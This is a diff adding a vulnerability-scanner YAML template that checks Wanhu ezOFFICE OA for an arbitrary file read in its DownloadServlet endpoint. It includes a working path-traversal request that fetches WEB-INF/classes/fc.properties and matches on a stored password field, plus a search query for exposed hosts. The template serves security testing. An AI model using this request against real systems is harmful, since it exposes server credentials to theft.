diff --git a/http/vulnerabilities/wanhu/wanhuoa-DownloadServlet-LFI.yaml b/http/vulnerabilities/wanhu/wanhuoa-DownloadServlet-LFI.yaml new file mode 100644 index 0000000000..b973bc9aa5 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhuoa-DownloadServlet-LFI.yaml @@ -0,0 +1,31 @@ +id: wanhuoa-DownloadServlet-LFI + +info: + name: wanhuoa DownloadServlet LFI + author: wp + severity: high + description: | + 万户OA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息 | The DownloadServlet interface has any file read vulnerability. Attackers can read sensitive files on the server and obtain sensitive information through this vulnerability + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="万户网络-ezOFFICE" + tags: oa,wanhu,LFI,high +http: + - raw: + - |+ + GET /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip, deflate + + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'ccerp.password')" + condition: and